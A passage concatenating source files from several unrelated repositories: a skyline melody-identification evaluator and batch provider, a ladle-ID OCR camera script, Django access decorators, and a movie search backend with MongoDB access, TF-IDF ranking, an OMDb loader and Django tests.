positives: " + str(overall_hp_tp)) print("False positives: " + str(overall_hp_fp)) print("True negatives: " + str(overall_hp_tn)) print("False negatives: " + str(overall_hp_fn)) p = overall_hp_tp / misc_tools.EPS(overall_hp_tp + overall_hp_fp) r = overall_hp_tp / misc_tools.EPS(overall_hp_tp + overall_hp_fn) print("Precision: " + str(p)) print("Recall: " + str(r)) print("Fmeasures: " + str(2 * r * p / misc_tools.EPS(p + r))) print("Avarage piece precision: " + str(np.mean(avarage_pieces_hp[0]))) print("Avarage piece recall: " + str(np.mean(avarage_pieces_hp[1]))) print("Avarage piece fmeasure: " + str(np.mean(avarage_pieces_hp[2]))) def my_skyline_notelists(notelist): """ perform a variation a the skyline algorithm by taking always the highest pitch at each time. *notelist* must be in the form returned by misc_tools.load_files RETURNS : the list of predicted labels, where 1 is for melody note and 0 is for accompaniment """ # ordering notelist by onset notelist = sorted(notelist, key=lambda x: x[1]) predicted_label = [0 for n in range(len(notelist))] previous_onset = 99999999999 # the first time is not a new onset last_melody_offset = 0 highest_pitch = 0 melody_index = 0 last_melody_pitch = 0 for i, (pitch, onset, offset, ismelody) in enumerate(notelist): if pitch > highest_pitch: # look for the highest pitch among notes at this offset highest_pitch = pitch melody_index = i elif onset > previous_onset: # this is a new onset: # test if among notes at the previous onset there is a melody note if highest_pitch > last_melody_pitch or previous_onset >= last_melody_offset: # mark the new melody note predicted_label[melody_index] = 1 last_melody_offset = notelist[melody_index][2] last_melody_pitch = notelist[melody_index][0] highest_pitch = 0 previous_onset = onset return predicted_label def skyline_notelists(notelist): """ performs the skyline algorithm in its original formulation over the *notelist* in input. *notelist* is in the form returned by misc_tools.load_files Reference paper: <NAME> and <NAME>, "Melodic matching techniques for large music databases," in Proceedings of the 7th ACM International Conference on Multimedia '99, Orlando, FL, USA, October 30 - November 5, 1999, Part 1., 1999, pp. 57-66. RETURNS : the list of predicted labels, where 1 is for melody note and 0 is for accompaniment """ # ordering notelist by onset notelist = sorted(notelist, key=lambda x: x[1]) predicted_label = [0 for n in range(len(notelist))] previous_onset = 99999999999 # the first time is not a new onset highest_pitch = 0 melody_index = 0 for i, (pitch, onset, offset, ismelody) in enumerate(notelist): # take all notes at this onset if onset > previous_onset: # this is a new onset predicted_label[melody_index] = 1 highest_pitch = pitch melody_index = i elif pitch > highest_pitch: # chose the highest pitch highest_pitch = pitch melody_index = i previous_onset = onset return predicted_label def test_skyline_notelists(PATH=settings.DATA_PATH, variation=False): """ This test the skyline algorithm on the whole dataset contained in *PATH*. if *variation* is True, then *my_skyline_notelists* is used, otherwise *skyline_notelists* is used. """ X, Y, map_sw, notelists = misc_tools.load_files( PATH, 128, return_notelists=True) del X, Y, map_sw fmeasure_list = [] precision_list = [] recall_list = [] for i, notelist in enumerate(notelists): if variation: predicted_labels = my_skyline_notelists(notelist) else: predicted_labels = skyline_notelists(notelist) true_labels = zip(*notelist)[-1] precision = sklearn.metrics.precision_score( true_labels, predicted_labels) recall = sklearn.metrics.recall_score(true_labels, predicted_labels) fmeasure = 2 * precision * recall / (precision + recall) print("Piece number: " + str(i)) print("Precision: " + str(precision)) print("Recall: " + str(recall)) print("F1-measure: " + str(fmeasure)) print("") fmeasure_list.append(fmeasure) precision_list.append(precision) recall_list.append(recall) print("Average precision: " + str(np.mean(precision_list))) print("Average recall: " + str(np.mean(recall_list))) print("Average fmeasure: " + str(np.mean(fmeasure_list))) if __name__ == '__main__': # print("Testing with pianorolls...") # print("__________________________") # test_skyline_pianorolls() DATA_PATH = settings.DATA_PATH import sys if len(sys.argv) > 1: DATA_PATH = sys.argv[1] print("Using data path: " + DATA_PATH) print("Testing with notelists...") print("__________________________") test_skyline_notelists(PATH=DATA_PATH, variation=False) # print("") # print("And now the variation...") # print("__________________________") # test_skyline_notelists(variation=True) ``` #### File: Symbolic-Melody-Identification/nn_models/batch_provider.py ```python import numpy as np class RecurrentBatchProvider(object): """A class to load data from files and serve it in batches for sequential models """ def __init__(self, dtype=np.float32): self.data = [] self.sizes = [] self.dtype = dtype def store_data(self, *args): if not all([len(x) == len(args[0]) for x in args]): raise Exception('The length of each array must be the same') self.n_inputs = len(args) dims = [None] * len(args) for arrays in zip(*args): for i, array in enumerate(arrays): if not np.all(dims[i] == array.shape[1:]): if dims[i] is None: dims[i] = array.shape[1:] else: raise Exception( 'Cannot deal with variable output shapes') self.data.append(arrays) self.sizes.append(len(arrays[0])) self.dims = dims self._cs = np.r_[0, np.cumsum(self.sizes)] def _make_batch_array(self, batch_size, segment_length, dim): return np.empty([batch_size, segment_length] + list(dim), dtype=self.dtype) def make_batch_arrays(self, batch_size, segment_length): return [self._make_batch_array(batch_size, segment_length, dim) for dim in self.dims] def iter_pieces(self): for arrays in self.data: yield (array[np.newaxis, :].astype(self.dtype, copy=False) for array in arrays) def _get_batch(self, segment_producer, batch_size, segment_length, batch_arrays=None): if batch_arrays is None: batch_arrays = self.make_batch_arrays(batch_size, segment_length) else: # Check that the number of given arrays is the same as the number of # inputs if len(batch_arrays) != self.n_inputs: raise Exception(('Different number of arrays provided: {0} given ' 'but {1} expected').format(len(batch_arrays), self.n_inputs)) for i, (piece, segment_end) in enumerate(segment_producer(batch_size, segment_length)): arrays = self.data[piece] start = segment_end - segment_length start_trimmed = max(0, start) for batch_a, array in zip(batch_arrays, arrays): batch_a[i, - (segment_end - start_trimmed):] = array[ start_trimmed: segment_end] if start < 0: for batch_a in batch_arrays: batch_a[i, :- (segment_end - start_trimmed)] = 0 return batch_arrays def _select_segments_start(self, k, segment_size): available_idx = np.array(self.sizes) - segment_size valid = np.where(available_idx >= 0)[0] try: piece_idx = valid[np.random.randint(0, len(valid), k)] except ValueError: raise Exception(("No sequence is in the dataset is long enough " "to extract segments of length {}") .format(segment_size)) return np.column_stack( (piece_idx, np.ones(k, dtype=np.int) * segment_size)) def _select_segments_end(self, k, segment_size): sizes = np.array(self.sizes) available_idx = sizes - segment_size valid = np.where(available_idx >= 0)[0] try: piece_idx = valid[np.random.randint(0, len(valid), k)] except ValueError: raise Exception(("No sequence is in the dataset is long enough " "to extract segments of length {}") .format(segment_size)) return np.column_stack((piece_idx, sizes[piece_idx])) def _select_segments_valid(self, k, segment_size): available_idx = np.array(self.sizes) - segment_size + 1 valid = np.where(available_idx > 0)[0] cum_idx = np.cumsum(available_idx[valid]) try: segment_starts = np.random.randint(0, cum_idx[-1], k) except ValueError: raise Exception(("No sequence is in the dataset is long enough " "to extract segments of length {}") .format(segment_size)) piece_idx = np.searchsorted(cum_idx - 1, segment_starts, side='left') index_within_piece = segment_starts - np.r_[0, cum_idx[:-1]][piece_idx] return np.column_stack( # (valid[piece_idx], index_within_piece)) (valid[piece_idx], index_within_piece + segment_size)) def _select_segments_full(self, k, segment_size): total_instances = self._cs[-1] segment_ends = np.random.randint(1, total_instances + 1, k) piece_idx = np.searchsorted(self._cs[1:], segment_ends, side='left') index_within_piece = segment_ends - self._cs[piece_idx] return np.column_stack((piece_idx, index_within_piece)) def get_batch_full(self, batch_size, segment_length, batch_arrays=None): """ Return a batch from the stored data. The segments in the batch may start before the start of a data sequence. In this case, they are zero-padded on the left, up to the start of the sequence. Parameters ---------- batch_size : int The number sequences to generate segment_length : int The desired length of the sequences batch_arrays : list of ndarrays, optional A list of arrays for storing the batch data in Returns ------- tuple A tuple with ndarrays, containing the data for the batch """ return self._get_batch(self._select_segments_full, batch_size, segment_length, batch_arrays) def get_batch_valid(self, batch_size, segment_length, batch_arrays=None): """ Return a batch from the stored data. Other than for `get_batch_full`, the segments in the batch are always the subseqeuence of a data sequence. No zero-padding will take place. Note that this implies that data from sequences shorter than `segment_length` will never appear in the returned batches. Parameters ---------- batch_size : int The number sequences to generate segment_length : int The desired length of the sequences batch_arrays : list of ndarrays, optional A list of arrays for storing the batch data in Returns ------- tuple A tuple with ndarrays, containing the data for the batch """ return self._get_batch(self._select_segments_valid, batch_size, segment_length, batch_arrays) def get_batch_start(self, batch_size, segment_length, batch_arrays=None): """ Return a batch from the stored data. This function returns only segments starting at the beginning of a data sequence. Parameters ---------- batch_size : int The number sequences to generate segment_length : int The desired length of the sequences batch_arrays : list of ndarrays, optional A list of arrays for storing the batch data in Returns ------- tuple A tuple with ndarrays, containing the data for the batch """ return self._get_batch(self._select_segments_start, batch_size, segment_length, batch_arrays) def get_batch_end(self, batch_size, segment_length, batch_arrays=None): """ Return a batch from the stored data. This function returns only segments ending at the end of a data sequence. Parameters ---------- batch_size : int The number sequences to generate segment_length : int The desired length of the sequences batch_arrays : list of ndarrays, optional A list of arrays for storing the batch data in Returns ------- tuple A tuple with ndarrays, containing the data for the batch """ return self._get_batch(self._select_segments_end, batch_size, segment_length, batch_arrays) if __name__ == '__main__': n_inputs = 2 n_outputs = 2 n_pieces = 3 n_features = 4 min_piece_len = 15 max_piece_len = 30 # create some data piece_lens = np.random.randint(min_piece_len, max_piece_len + 1, n_pieces) X = [np.column_stack((np.ones(n_instances) * i, np.arange(n_instances))).astype(np.int) for i, n_instances in enumerate(piece_lens)] Y = [np.random.random((n_instances, n_outputs, n_features)) for n_instances in piece_lens] # Y = X bp = RecurrentBatchProvider() bp.store_data(X, Y) for x, y in bp.iter_pieces(): print x, y ```
{ "source": "2019pee0029/laddleApp", "score": 2 }
#### File: 2019pee0029/laddleApp/setup_cv1.py ```python import sys sys.path.append('D://laddleApp') from recoModel.demo import * from recoModel.model import RecoModel import string import torch import torch.backends.cudnn as cudnn import torch.utils.data from recoModel.utils import CTCLabelConverter, AttnLabelConverter from recoModel.dataset import RawDataset, AlignCollate from detectModel.test import * from PIL import Image import cv2 as cv import threading from log import log, setupTimeRotatedLog setupTimeRotatedLog("Laddle-Id-detection.log", log) #recognizer model opt = initializeParsers() opt.FeatureExtraction = 'ResNet' opt.SequenceModeling = 'BiLSTM' opt.Prediction = 'Attn' opt.test_image = 'street_name.jpg' opt.image_folder = 'result' opt.Transformation = 'TPS' opt.saved_model = 'D:\\laddleApp\\recoModel\\weights\\TPS-ResNet-BiLSTM-Attn.pth' # detector model args = initializeDetectModelParsers() args.trained_model = "D:\\laddleApp\\detectModel\\weights\\craft_mlt_25k.pth" args.test_folder = "D:\\laddleApp\\detectModel\\test2\\" net = LoadDetectionModel(args) reco = LoadRecoModel(opt) #res = Recognize(opt,reco) log.info("loaded all models") class VideoCamera(object): def __init__(self): self.video = cv.VideoCapture( 'rtsp://172.16.31.10/cam/realmonitor?channel=1&subtype=1&unicast=true&proto=Onvif') #172.24.136.242:554 #self.video = cv.VideoCapture('D:\\AI DS Projects\\rec_17_30.avi') (self.grabbed, self.frame) = self.video.read() threading.Thread(target=self.update, args=()).start() def __del__(self): self.video.release() def get_frame(self): ret, image = self.grabbed, self.frame return ret,image def update(self): while True: (self.grabbed, self.frame) = self.video.read() def DetectTextArea(image): "takes an image path and returns detected boxes" preds = PredictDetection(args, net, image, opt,reco) return preds cam = VideoCamera() ret, frame = cam.get_frame() while(ret): ret, frame = cam.get_frame() preds,img = (DetectTextArea(frame)) cv.imshow('frame',img) cv.moveWindow('frame', 200, 200) if cv.waitKey(1) & 0xFF == ord('q'): cv.destroyAllWindows() break ```
{ "source": "2019somsom/som-django-new-", "score": 2 }
#### File: som-django-new-/users/decorators.py ```python from django.conf import settings from django.shortcuts import redirect from django.contrib import messages import sys, os sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from eggmorning.models import User from django.http import HttpResponse def login_message_required(function): def wrap(request, *args, **kwargs): if not request.user.is_authenticated: messages.info(request, "로그인한 사용자만 이용할 수 있습니다.") return redirect(settings.LOGIN_URL) return function(request, *args, **kwargs) return wrap def admin_required(function): def wrap(request, *args, **kwargs): if request.user.level == '1' or request.user.level == '0': return function(request, *args, **kwargs) messages.info(request, "접근 권한이 없습니다.") return redirect('/users/main/') return wrap def logout_message_required(function): def wrap(request, *args, **kwargs): if request.user.is_authenticated: messages.info(request, "접속중인 사용자입니다.") return redirect('/users/main/') return function(request, *args, **kwargs) return wrap ```
{ "source": "2019-Spring-Information-Retrieval/backend", "score": 3 }
#### File: aws_controller/advancedSearch/DatabaseDAO.py ```python import queryWorker import rankWorker import pymongo import bson.json_util import pprint class DatabaseDAO: def __init__(self): self.cacheDb = None def connectToDatabase(self): if self.cacheDb: return self.cacheDb client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>") self.cacheDb = client['IMDBData'] return self.cacheDb def advancedSearch(self, query: str): q = queryWorker.QueryWorker() words, index2docs = q.output(dao, query) r = rankWorker.RankWorker(dao) r.input(words, index2docs) docs = r.output() return docs dao = DatabaseDAO() # dao.connectToDatabase() # print(dao.getOneMovie("Albela")) # print(dao.getMovieFromTo(1,5)) # print(dao.getMovieFromTo("Drama",1,5)) # pprint.pprint(dao.getTopRated(10)) ``` #### File: aws_controller/retrieveMovies/DatabaseDAO.py ```python import pymongo import bson.json_util import pprint from bson import ObjectId class DatabaseDAO: def __init__(self): self.cacheDb = None self.puncts = [',', '.', '"', ':', ')', '(', '-', '!', '?', '|', ';', "'", '$', '&', '/', '[', ']', '>', '%', '=', '#', '*', '+', '\\', '•', '~', '@', '£', '·', '_', '{', '}', '©', '^', '®', '`', '<', '→', '°', '€', '™', '›', '♥', '←', '×', '§', '″', '′', 'Â', '█', '½', 'à', '…', '“', '★', '”', '–', '●', 'â', '►', '−', '¢', '²', '¬', '░', '¶', '↑', '±', '¿', '▾', '═', '¦', '║', '―', '¥', '▓', '—', '‹', '─', '▒', ':', '¼', '⊕', '▼', '▪', '†', '■', '’', '▀', '¨', '▄', '♫', '☆', 'é', '¯', '♦', '¤', '▲', 'è', '¸', '¾', 'Ã', '⋅', '‘', '∞', '∙', ')', '↓', '、', '│', '(', '»', ',', '♪', '╩', '╚', '³', '・', '╦', '╣', '╔', '╗', '▬', '❤', 'ï', 'Ø', '¹', '≤', '‡', '√', ] self.punct_mapping = {"‘": "'", "₹": "e", "´": "'", "°": "", "€": "e", "™": "tm", "√": " sqrt ", "×": "x", "²": "2", "—": "-", "–": "-", "’": "'", "_": "-", "`": "'", '“': '"', '”': '"', '“': '"', "£": "e", '∞': 'infinity', 'θ': 'theta', '÷': '/', 'α': 'alpha', '•': '.', 'à': 'a', '−': '-', 'β': 'beta', '∅': '', '³': '3', 'π': 'pi', } self.specials = {'\u200b': ' ', '…': ' ... ', '\ufeff': '', 'करना': '', 'है': ''} def connectToDatabase(self): if self.cacheDb: return self.cacheDb client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>") self.cacheDb = client['IMDBData'] return self.cacheDb def replace_punct(self, x): x = str(x) for p in self.punct_mapping: x = x.replace(p, self.punct_mapping[p]) for punct in self.puncts: x = x.replace(punct, '')#f' {punct} ') for s in self.specials: x = x.replace(s, self.specials[s]) return x.lower().split() def getOneMovie(self, title): return self.cacheDb['Movies'].find_one({"Title": title}) def getManyMovies(self, query, number): text = '^' for word in self.replace_punct(query): text = text + word + "[ : -]*" # if self.cacheDb['Movies'].count_documents({'Title': {"$regex": '^' + query , '$options':'i'}}) < int(number): # return bson.json_util.dumps(self.cacheDb['Movies'].find({'Title': {"$regex": '^' + query, '$options':'i' }})) # return bson.json_util.dumps(self.cacheDb['Movies'].find({'Title': {"$regex": '^' + query, '$options':'i'}}).limit(int(number))) return bson.json_util.dumps( self.cacheDb['Movies'].find({'Title': {"$regex": text, '$options': 'i'}}).limit(int(number))) def countAll(self, genre): return self.cacheDb['Movies'].count_documents({'Genre': {"$regex": ".*" + genre + ".*"}}) def getMovieFromTo(self, genre, start, end): return bson.json_util.dumps(self.cacheDb['Movies'].find({'Genre': {"$regex": ".*" + genre + ".*"}}).skip(int(start)).limit(int(end))) def getTopRated(self, num, minVote): return bson.json_util.dumps(self.cacheDb['Movies'].find({"imdbRating": {"$lt": 10.1}, "imdbVotes": {"$gt": int(minVote)}}).sort([("imdbRating", -1), ("imdbVotes", -1)]).limit(int(num))) dao = DatabaseDAO() dao.connectToDatabase() print(dao.replace_punct("Captain America: Civil ")) pprint.pprint(dao.getManyMovies("Captain America: C ", 100)) # pprint.pprint(dao.getWatchlist("<EMAIL>",1,1)) # dao.convert() # pprint.pprint(bson.json_util.dumps(dao.check())) # print(dao.getOneMovie("How to Train Your Dragon")) # print(dao.getMovieFromTo(1,5)) # pprint.pprint(dao.getMovieFromTo("Drama",1,5)) # pprint.pprint(dao.getTopRated(10, 2000)) ## First convert # 5c97f29812c54d2e52ab3a08 # Hanging Perverts # 64960 ## Second convert # 5c97fac912c54d2e52ab800c # A Painting Lesson # ------------ # 5c97fac912c54d2e52ab7f29 # Gearheads # ------------ # 5c97fac912c54d2e52ab7f2d # Inkaar # ------------ # 5c97fac912c54d2e52ab7f37 # On the Verge # ------------ # 5c97fac912c54d2e52ab7f91 # The City of Children # ------------ #82673 ## Third convert # ------------ # 114018 # 5c982a3b12c54d2e52ad5940 # Kaos # ------------ # 114019 # 5c982a3b12c54d2e52ad59ec # Deadly Match # ------------ # 114020 # 5c982a3b12c54d2e52ad585f # Devadas # ------------ # 114021 # 5c982a3b12c54d2e52ad597a # Tropykaos # ------------ # # # def convert(self): # doc = self.cacheDb['Movies'].find().limit(64960) # count = 1 # countError = 0 # for item in doc: # try: # item['imdbRating'] # except KeyError: # countError = countError + 1 # continue # # if (item['imdbRating'] == "N/A"): # countError = countError + 1 # continue # # try: # vote = item["imdbVotes"].replace(",", "") # except: # countError = countError + 1 # continue # if (item['imdbVotes'] == "N/A"): # countError = countError + 1 # continue # # print(count) # count = count + 1 # print((item['_id'])) # print((item['Title'])) # print("------------") # self.cacheDb['Movies'].update_one({"_id": item["_id"]}, # {"$set": # {"imdbRating": float(item['imdbRating']), # "imdbVotes": int(vote)}}, # upsert=False) # # # def check(self): # return self.cacheDb['Movies'].find({"_id": ObjectId("5c97cf1112c54d2abe3dca49")}) # # return self.cacheDb['Movies'].find({"_id": { "$lt" : ObjectId("5c97fac912c54d2e52ab7f37")}}).count() ``` #### File: aws_controller/SetUpNewUser/lambda_function.py ```python import json from DatabaseDAO import DatabaseDAO, dao from JSONEncoder import JSONEncoder count = -1 def lambda_handler(event, context): """Sample pure Lambda function Parameters ---------- event: dict, required API Gateway Lambda Proxy Input Format Event doc: https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-lambda-proxy-integrations.html#api-gateway-simple-proxy-for-lambda-input-format context: object, required Lambda Context runtime methods and attributes Context doc: https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html Returns ------ API Gateway Lambda Proxy Output Format: dict Return doc: https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-lambda-proxy-integrations.html """ # try: # ip = requests.get("http://checkip.amazonaws.com/") # except requests.RequestException as e: # # Send some context about this error to Lambda Logs # print(e) # raise e # context["callbackWaitsForEmptyEventLoop"] = "false" global dao global count count = count + 1 user = {} user["email"] = event["request"]["userAttributes"]["email"] user["nickname"] = event["request"]["userAttributes"]["nickname"] dao.connectToDatabase() dao.insertUser(user) return event ``` #### File: 2019-Spring-Information-Retrieval/backend/rankWorker.py ```python from typing import List, Dict from sklearn.feature_extraction.text import TfidfTransformer import numpy as np from collections import defaultdict from functools import reduce from pymongo import MongoClient np.set_printoptions(precision=5) def getFinalScore(scores: List[float], names: List[str]=None): weights = {'freq-plot': 0.79, 'freq-script': 0.63, 'freq-title': 0.88, 'post-script': 0.63, 'post-plot': 0.51} cur_weight = [weights[n] for n in names] new_weight = [w / sum(cur_weight) for w in cur_weight] results = 0 for ix, score in enumerate(scores): results += new_weight[ix] * score return results class RankWorker(object): """docstring for RankWorker """ def __init__(self): self.index2docs = {} # indextype : {word:{docid:freq}} self.doc2vecs = {} # indextype : {doc: feature matrix} self.docs2score = {} self.ix_to_doc = {} self.doc_to_ix = {} self.word_to_ix = {} self.qwords = [] self.index_ids = None self.limit_docs = None def input(self, qwords: List, index2docs: Dict, limit: int=None): """ """ # print(index2docs) self.index2docs = index2docs self.qwords = qwords self.index_ids = list(index2docs.keys()) if limit is not None: self.limit_docs = limit def precheck(self)->bool: """ whether the index2docs is larger than 0 """ flag = True self.word2index() self.docs2index() if len(self.index2docs) <= 0: flag = False elif len(self.qwords) == 0: flag = False elif max([len(self.index2docs[idx]) for idx in self.index_ids]) == 0: flag = False elif len(self.word_to_ix) == 0: flag = False elif len(self.doc_to_ix) == 0: flag = False return flag def word2index(self): for w in self.qwords: if w not in self.word_to_ix: self.word_to_ix[w] = len(self.word_to_ix) def docs2index(self): """ """ # 统计所有出现过的文档 for idx in self.index_ids: for wd in self.word_to_ix.keys(): # for every query word if wd not in self.index2docs[idx]: continue for d in self.index2docs[idx][wd].keys(): # for every doc id if d not in self.doc_to_ix: self.doc_to_ix[d] = len(self.doc_to_ix) # 反向索引 self.ix_to_doc = {ix: doc for doc, ix in self.doc_to_ix.items()} def docs2feature(self, index: str): """ """ # 建立倒排索引下的 文档-词汇频率 矩阵 doc2wordfreq = [[0] * len(self.word_to_ix) for _ in range(len(self.doc_to_ix))] for wd, docDict in self.index2docs[index].items(): for did, freq in docDict.items(): x = self.doc_to_ix[did] y = self.word_to_ix[wd] doc2wordfreq[x][y] = freq self.doc2vecs[index] = doc2wordfreq def docs2position(self, index: str): # 出现位置初始化为-1,当真有出现的时候,会直接覆盖出现位置的list word_doc_post = [[[-1] for __ in range( len(self.doc_to_ix))] for ___ in range(len(self.word_to_ix))] for wd in self.word_to_ix.keys(): for doc in self.doc_to_ix.keys(): if wd not in self.index2docs[index]: continue if doc not in self.index2docs[index][wd]: continue word_doc_post[self.word_to_ix[wd]][self.doc_to_ix[ doc]] = self.index2docs[index][wd][doc] self.doc2vecs[index] = word_doc_post def alignment(self, word_doc_post)->Dict: # N = len(self.word_to_ix) # word # M = len(self.doc_to_ix) # doc def comb(place1, place2, coda=' '): return [str(p1) + coda + str(p2) for p1 in place1 for p2 in place2] # 算分 这里是 直接算距离的方法 docs_score = [0] * len(self.doc_to_ix) # {} baseline = np.array([i + 1 for i in range(len(self.qwords))]) # 1 by N for doc in self.doc_to_ix.keys(): j = self.doc_to_ix[doc] places = [word_doc_post[self.word_to_ix[w]][j] for w in self.qwords] vectors = reduce(comb, places) # length = H comb_to_plcs = np.array([list(map(int, vec.split())) for vec in vectors]) # H by N scores = np.dot(baseline, comb_to_plcs.T) # 1 by H docs_score[j] = np.max(scores) # softmax(scores)) # 1 mean = sum(docs_score) / len(self.doc_to_ix) diff = max(docs_score) - min(docs_score) docs_to_score = {doc: ( docs_score[self.doc_to_ix[doc]] - mean + 1) / (diff + 1) for doc in self.doc_to_ix.keys()} return docs_to_score def freqRanking(self, index: str): self.docs2feature(index) freqs = [0 for _ in range(len(self.doc_to_ix))] for ix, vals in enumerate(self.doc2vecs[index]): freqs[ix] = sum(vals) / len(vals) mean = sum(freqs) / len(freqs) diff = max(freqs) - min(freqs) scores = [(f - mean + 1) / (diff + 1) for f in freqs] for ix, s in enumerate(scores): self.docs2score[self.ix_to_doc[ix]].append(s) def invertRanking(self, index: str): self.docs2feature(index) tfidf = TfidfTransformer() tfidfmat = tfidf.fit_transform(self.doc2vecs[index]) for ix, vec in enumerate(tfidfmat.toarray()): if np.square(vec).sum() != 0: score = np.sum(vec) / np.square(vec).sum() else: score = 0 self.docs2score[self.ix_to_doc[ix]].append(score) def positionRanking(self, index: str): self.docs2position(index) docs_score = self.alignment(self.doc2vecs[index]) for did in self.doc_to_ix: self.docs2score[did].append(docs_score[did]) def ranking(self)->List: """ The core of this class! 0. 将检索结果转化成特征向量 1. 计算不同特征的得分 2. 计算加权和 3. 排序 """ # 文档-分数 字典 self.docs2score = defaultdict(list) index_names = [] if len(self.qwords) > 1: if 'freq-plot' in self.index_ids: self.invertRanking('freq-plot') index_names.append('freq-plot') if 'freq-script' in self.index_ids: self.invertRanking('freq-script') index_names.append('freq-script') if 'post-plot' in self.index_ids: self.positionRanking('post-plot') index_names.append('post-plot') if 'post-plot' in self.index_ids: self.positionRanking('post-script') index_names.append('post-script') else: if 'freq-plot' in self.index_ids: self.freqRanking('freq-plot') index_names.append('freq-plot') if 'freq-script' in self.index_ids: self.freqRanking('freq-script') index_names.append('freq-script') # 2. 合计总分 scoring = [] ranking = [] for doc, scores in self.docs2score.items(): ranking.append(doc) scoring.append(getFinalScore(scores, index_names)) # 3. 根据总分排序 inds = np.argsort(scoring) ranking = np.array(ranking) ranking = ranking[inds] return ranking[::-1] def getDocs(self, docIDs: List)->List: """ get the original docs from database docsIDs: the docs id that need to obtain from database """ # 是否限制最大检索数量 nums = len(docIDs) if self.limit_docs is not None and nums > self.limit_docs: nums = self.limit_docs LOCAL_URL = "mongodb+srv://jack:<EMAIL>" mc = MongoClient(LOCAL_URL) db = mc['IMDBData'] c = db['Movies'] docs = [c.find_one({'imdbID': docIDs[i]}) for i in range(nums)] return [d for d in docs if d is not None] def output(self)->List: """ return the original docs """ docs = [] # 1. 检查输入是否合理 if self.precheck() is False: return docs # 2. 排序 docIDs = self.ranking() # 获得对应文档 docs = self.getDocs(docIDs) return docs ``` #### File: backend/storeData/ImdbToMongodb.py ```python import requests import pymongo import pandas as pd # key: fe53f97e class ImdbToMongoDB: def __init__(self, key): self.url = "http://www.omdbapi.com/?apikey=" + key + "&i=" self.client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>") def readMovieFile(self, num): df = pd.read_csv("movieFragments/movieData" + str(num) + ".csv") return df['tconst'].values.tolist() def imdbAPI(self, id): return requests.get(self.url + id + "&plot=full").json() def sendToMongoDB(self): db = self.client['IMDBData'] collection = db['Movies'] movie = self.imdbAPI("tt1431045") collection.insert_one(movie) # for i in range(35000, 207581, 5000): # print("------------------------------------") # print("I am sending the movieData" + str(i) + ".csv file") # movieIDList = self.readMovieFile(i) # count = 0 # movies = [] # for id in movieIDList: # try: # movie = self.imdbAPI(id) # movies.append(movie) # if count % 1000 == 0: # print(count) # count = count + 1 # except: # print("This id:" + id + " results problem.") # # collection.insert_many(movies) # test = ImdbToMongoDB("fe53f97e") # test.sendToMongoDB() ```
{ "source": "2019-swpp-8/swpp", "score": 2 }
#### File: swpp/migrations/0011_load_initial_data.py ```python from django.db import migrations from django.core.management import call_command fixture = 'initial_data' def load_fixture(apps, schema_editor): unload_fixture(apps, schema_editor) call_command('loaddata', fixture, app_label='swpp') def unload_fixture(apps, schema_editor): lecture = apps.get_model('swpp', 'lecture') lecture.objects.all().delete() class Migration(migrations.Migration): dependencies = [ ('swpp', '0010_profile_name'), ] operations = [ migrations.RunPython(load_fixture, reverse_code = unload_fixture) ] ``` #### File: swpp/model/times.py ```python from django.db import models from annoying.fields import AutoOneToOneField class Times(models.Model): mon = models.BigIntegerField(default = 0) tue = models.BigIntegerField(default = 0) wed = models.BigIntegerField(default = 0) thu = models.BigIntegerField(default = 0) fri = models.BigIntegerField(default = 0) sat = models.BigIntegerField(default = 0) sun = models.BigIntegerField(default = 0) # other is Times def flip(self, other): self.mon ^= other.mon self.tue ^= other.tue self.wed ^= other.wed self.thu ^= other.thu self.fri ^= other.fri self.sat ^= other.sat self.sun ^= other.sun # other is TimesSerializer # minInterval, total: 1 per 30 min. ex) 4 = 2 hrs def isAvailable(self, other, minInterval, total): mon = self.mon & other.data['mon'] tue = self.tue & other.data['tue'] wed = self.wed & other.data['wed'] thu = self.thu & other.data['thu'] fri = self.fri & other.data['fri'] sat = self.sat & other.data['sat'] sun = self.sun & other.data['sun'] available = 0 for time in (mon, tue, wed, thu, fri, sat, sun): combo = 0 while time: if time & 1: combo += 1 else: if combo >= minInterval: available += combo combo = 0 time >>= 1 if combo >= minInterval: available += combo return available >= total ``` #### File: backend/swpp/tests.py ```python from django.test import TestCase from django.contrib.auth import get_user_model from rest_framework.test import APITestCase, APITransactionTestCase from swpp.apps import SwppConfig from datetime import datetime, timezone, timedelta from rest_framework import serializers, status from swpp.serializers import * from django.core import mail from django.utils.encoding import smart_text import re class LowLevelTests(APITestCase): def create_user(self, username, password): return self.User.objects.create_user(username, password) def setUp(self): self.User = get_user_model() def test_sanity(self): self.assertTrue(True) def test_app_name(self): self.assertEqual(SwppConfig.name, 'swpp') def test_user_profile_relation(self): user = self.create_user('t', '1') self.assertTrue(hasattr(user, 'profile')) self.assertTrue(hasattr(user.profile, 'user')) self.assertEqual(user, user.profile.user) def test_profile_joined_time(self): from_time = datetime.now(timezone.utc) - timedelta(seconds = 1) user = self.create_user('t', '1') to_time = datetime.now(timezone.utc) + timedelta(seconds = 1) self.assertTrue(user.profile.joined >= from_time) self.assertTrue(user.profile.joined <= to_time) def test_user_profile_tutor_relation(self): user = self.create_user('t', '1') self.assertTrue(hasattr(user, 'profile')) self.assertTrue(hasattr(user.profile, 'user')) self.assertEqual(user, user.profile.user) self.assertTrue(hasattr(user.profile, 'tutor')) self.assertTrue(hasattr(user.profile.tutor, 'profile')) self.assertEqual(user.profile, user.profile.tutor.profile) # added 05/01, from modelInit branch def test_valid_profile(self): user = self.create_user('s', '2') data = {'major': '', 'contact': '010-1111-1111', 'name': 'test'} serializer = ProfileSerializer(user.profile, data = data, partial = True) self.assertFalse(serializer.is_valid()) data['major'] = 'bio' serializer = ProfileSerializer(user.profile, data = data, partial = True) self.assertTrue(serializer.is_valid()) serializer.save() data['contact'] = '010-11111-1111' serializer = ProfileSerializer(user.profile, data = data, partial = True) self.assertFalse(serializer.is_valid()) def test_valid_times(self): user = self.create_user('q', '3') self.assertEqual(user.profile.tutor.times.mon, 0) data = {'mon': 1 << 48, 'tue': (1 << 48) - 1, 'wed': 1 << 47, 'thu': 1, 'fri': 0, 'sat': -1, 'sun': -(1 << 48) + 1} serializer = TimesSerializer(data = data) self.assertFalse(serializer.is_valid()) data['mon'] = 1 serializer = TimesSerializer(data = data) self.assertFalse(serializer.is_valid()) data['sat'] = 3 serializer = TimesSerializer(data = data) 